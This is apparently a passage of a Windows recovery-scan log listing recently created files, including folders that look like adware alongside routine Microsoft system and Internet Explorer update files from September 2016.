    2016-09-18 08:04 - 2016-09-18 08:50 - 00000000 ____D C:\Program Files\nplusb
    2016-09-18 08:03 - 2016-09-18 09:49 - 00000000 ____D C:\Program Files (x86)\KuaiZipb
    2016-09-18 08:03 - 2016-09-18 08:04 - 07090176 _____ C:\Users\Administrator\AppData\Roaming\agent.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 00018432 _____ C:\Users\Administrator\AppData\Roaming\Main.dat
    2016-09-18 08:03 - 2016-09-18 08:03 - 00000000 ____D C:\Users\Administrator\AppData\Local\A
    2016-09-18 08:01 - 2016-09-18 20:37 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Gajedefsim
    2016-09-18 08:01 - 2016-09-18 20:37 - 00000000 ____D C:\Program Files (x86)\hostb
    2016-09-18 08:01 - 2016-09-18 08:48 - 00000000 ____D C:\Program Files\IcattiUnb
    2016-09-18 08:01 - 2016-09-18 08:01 - 00140288 _____ C:\Users\Administrator\AppData\Roaming\Installer.dat
    2016-09-18 08:01 - 2016-09-18 08:01 - 00000000 ____D C:\Users\Administrator\AppData\Local\Tempfolder
    2016-09-18 07:59 - 2016-09-18 20:37 - 00000000 ____D C:\Program Files\Casterb
    2016-09-18 07:59 - 2016-09-18 20:37 - 00000000 ____D C:\Program Files (x86)\DPowerb
    2016-09-18 07:58 - 2016-09-18 20:37 - 00000000 ____D C:\Users\Administrator\AppData\Local\Apps\2.0
    2016-09-18 07:58 - 2016-09-18 20:37 - 00000000 ____D C:\Program Files (x86)\EasyHotspotb
    2016-09-18 07:56 - 2016-09-18 07:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Youtube Downloader
    2016-09-18 07:55 - 2016-09-19 21:37 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\Interstatnogui
    2016-09-18 06:33 - 2016-09-18 06:33 - 00000000 ____D C:\Users\Default\AppData\Local\Microsoft Help
    2016-09-18 06:33 - 2016-09-18 06:33 - 00000000 ____D C:\Users\Default User\AppData\Local\Microsoft Help
    2016-09-16 21:23 - 2016-09-16 21:25 - 00000000 ____D C:\WINDOWS\system32\MRT
    2016-09-16 21:23 - 2016-09-16 21:23 - 144199024 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
    2016-09-16 21:12 - 2016-09-18 08:50 - 00000000 ____D C:\SUPERDelete
    2016-09-16 18:49 - 2016-09-16 18:50 - 40326904 _____ C:\Users\Administrator\Downloads\Firefox_Setup.exe
    2016-09-16 18:46 - 2016-09-16 18:46 - 00985288 _____ (Slimware Utilities Holdings, Inc.) C:\Users\Administrator\Downloads\DriverUpdate-setup.exe
    2016-09-16 10:46 - 2016-09-16 11:05 - 00000000 ____D C:\aa Canon 450D Master acum
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\WINDOWS\PCHEALTH
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SharePoint
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
    2016-09-16 10:41 - 2016-09-16 10:41 - 00000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 8
    2016-09-16 10:39 - 2016-09-16 10:39 - 00000000 ___RD C:\MSOCache
    2016-09-16 10:39 - 2016-09-16 10:39 - 00000000 ____D C:\Users\Administrator\AppData\Local\Microsoft Help
    2016-09-16 10:39 - 2016-09-16 10:39 - 00000000 ____D C:\Program Files\Microsoft Office
    2016-09-16 10:34 - 2016-09-16 10:35 - 266433120 _____ (Microsoft Corporation) C:\Users\Administrator\Downloads\SharePointDesigner.exe
    2016-09-14 01:10 - 2016-09-01 15:26 - 00394440 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
    2016-09-14 01:10 - 2016-09-01 14:41 - 00346320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
    2016-09-14 01:10 - 2016-08-31 23:18 - 02724864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
    2016-09-14 01:10 - 2016-08-31 23:08 - 20312064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
    2016-09-14 01:10 - 2016-08-31 22:48 - 00062464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iesetup.dll
    2016-09-14 01:10 - 2016-08-31 22:46 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
    2016-09-14 01:10 - 2016-08-31 22:46 - 00341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\html.iec
    2016-09-14 01:10 - 2016-08-31 22:46 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieetwproxystub.dll
    2016-09-14 01:10 - 2016-08-31 22:44 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
    2016-09-14 01:10 - 2016-08-31 22:34 - 02286592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
    2016-09-14 01:10 - 2016-08-31 22:31 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
    2016-09-14 01:10 - 2016-08-31 22:31 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iernonce.dll
    2016-09-14 01:10 - 2016-08-31 22:26 - 00476160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieui.dll
    2016-09-14 01:10 - 2016-08-31 22:24 - 00663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
    2016-09-14 01:10 - 2016-08-31 22:24 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieUnatt.exe
    2016-09-14 01:10 - 2016-08-31 22:23 - 00620032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
    2016-09-14 01:10 - 2016-08-31 22:08 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtmsft.dll
    2016-09-14 01:10 - 2016-08-31 21:59 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JavaScriptCollectionAgent.dll
    2016-09-14 01:10 - 2016-08-31 21:57 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inseng.dll
    2016-09-14 01:10 - 2016-08-31 21:53 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrating.dll
    2016-09-14 01:10 - 2016-08-31 21:52 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
    2016-09-14 01:10 - 2016-08-31 21:48 - 00279040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
    2016-09-14 01:10 - 2016-08-31 21:45 - 00130048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\occache.dll
    2016-09-14 01:10 - 2016-08-31 21:34 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
    2016-09-14 01:10 - 2016-08-31 21:30 - 00692736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
    2016-09-14 01:10 - 2016-08-31 21:29 - 02055680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
    2016-09-14 01:10 - 2016-08-31 21:29 - 01155072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmlmedia.dll
    2016-09-14 01:10 - 2016-08-31 21:27 - 13808128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
    2016-09-14 01:10 - 2016-08-31 21:24 - 04607488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
    2016-09-14 01:10 - 2016-08-31 20:45 - 25770496 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
    2016-09-14 01:10 - 2016-08-31 20:43 - 02445824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
    2016-09-14 01:10 - 2016-08-31 20:42 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
    2016-09-14 01:10 - 2016-08-31 20:40 - 02724864 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
    2016-09-14 01:10 - 2016-08-31 20:40 - 00004096 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieetwcollectorres.dll
    2016-09-14 01:10 - 2016-08-31 20:38 - 01316352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
    2016-09-14 01:10 - 2016-08-31 20:25 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iesetup.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 02894336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 00576000 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\html.iec
    2016-09-14 01:10 - 2016-08-31 20:24 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
    2016-09-14 01:10 - 2016-08-31 20:24 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieetwproxystub.dll
    2016-09-14 01:10 - 2016-08-31 20:16 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
    2016-09-14 01:10 - 2016-08-31 20:15 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\iernonce.dll
    2016-09-14 01:10 - 2016-08-31 20:12 - 00615936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
    2016-09-14 01:10 - 2016-08-31 20:11 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieUnatt.exe
    2016-09-14 01:10 - 2016-08-31 20:11 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieetwcollector.exe
    2016-09-14 01:10 - 2016-08-31 20:10 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
    2016-09-14 01:10 - 2016-08-31 20:10 - 00814080 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
    2016-09-14 01:10 - 2016-08-31 20:06 - 06047232 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
    2016-09-14 01:10 - 2016-08-31 20:03 - 00968704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MsSpellCheckingFacility.exe
    2016-09-14 01:10 - 2016-08-31 19:59 - 00489984 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtmsft.dll
    2016-09-14 01:10 - 2016-08-31 19:51 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\JavaScriptCollectionAgent.dll
    2016-09-14 01:10 - 2016-08-31 19:50 - 00107520 _____ (Microsoft Corporation) C:\WINDOWS\system32\inseng.dll
    2016-09-14 01:10 - 2016-08-31 19:47 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrating.dll
    2016-09-14 01:10 - 2016-08-31 19:46 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
    2016-09-14 01:10 - 2016-08-31 19:44 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
    2016-09-14 01:10 - 2016-08-31 19:42 - 00152064 _____ (Microsoft Corporation) C:\WINDOWS\system32\occache.dll
    2016-09-14 01:10 - 2016-08-31 19:31 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
    2016-09-14 01:10 - 2016-08-31 19:29 - 00724992 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
    2016-09-14 01:10 - 2016-08-31 19:28 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
    2016-09-14 01:10 - 2016-08-31 19:27 - 01359360 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmlmedia.dll
    2016-09-14 01:10 - 2016-08-31 19:26 - 02131456 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
    2016-09-14 01:10 - 2016-08-31 19:15 - 15411712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
    2016-09-14 01:10 - 2016-08-31 19:10 - 02921472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
    2016-09-14 01:10 - 2016-08-31 18:58 - 01550848 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
    2016-09-14 01:10 - 2016-08-31 18:47 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
    2016-09-14 01:10 - 2016-08-12 12:26 - 00464896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
    2016-09-14 01:10 - 2016-08-12 12:26 - 00405504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
    2016-09-14 01:10 - 2016-08-12 12:26 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srvnet.sys
    2016-09-14 01:09 - 2016-09-02 11:40 - 00631176 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
    2016-09-14 01:09 - 2016-09-02 11:35 - 05548264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
    2016-09-14 01:09 - 2016-09-02 11:35 - 00706280 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
    2016-09-14 01:09 - 2016-09-02 11:35 - 00154856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
    2016-09-14 01:09 - 2016-09-02 11:35 - 00095464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys
    2016-09-14 01:09 - 2016-09-02 11:34 - 01732864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00503808 _____ (Microsoft Corporation) C:\WINDOWS\system32\srcore.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64win.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00215552 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdigest.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00135680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSpkg.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\srclient.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspisrv.dll
    2016-09-14 01:09 - 2016-09-02 11:31 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64cpu.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 01464320 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 01212928 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 01163264 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00880640 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00730624 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00690688 _____ (Microsoft Corporation) C:\WINDOWS\system32\adtschema.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00463872 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00419840 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00316416 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00312320 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncrypt.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00190464 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpchttp.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\msaudite.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\setbcdlocale.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\msobjs.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidapi.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptbase.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidsvc.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\secur32.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\credssp.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntvdm64.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\system32\apisetschema.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00006144 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-security-base-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00005120 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-file-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-threadpool-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-processthreads-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-sysinfo-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-synch-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-localregistry-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-localization-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-processenvironment-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-namedpipe-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-misc-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-memory-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-libraryloader-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-heap-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-xstate-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-util-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-string-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-profile-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-io-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-interlocked-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-handle-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-fibers-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-errorhandling-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-delayload-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-debug-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-datetime-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-console-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:21 - 04000488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntkrnlpa.exe
    2016-09-14 01:09 - 2016-09-02 11:21 - 03944680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntoskrnl.exe
    2016-09-14 01:09 - 2016-09-02 11:18 - 01314112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 01114112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00690688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\adtschema.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00666112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00644096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\advapi32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00553472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00260608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00254464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ncrypt.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00172032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdigest.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msaudite.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpchttp.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00096768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sspicli.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSpkg.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msobjs.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00050688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appidapi.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srclient.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\secur32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credssp.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apisetschema.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00005120 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-file-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wow32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-string-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-io-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
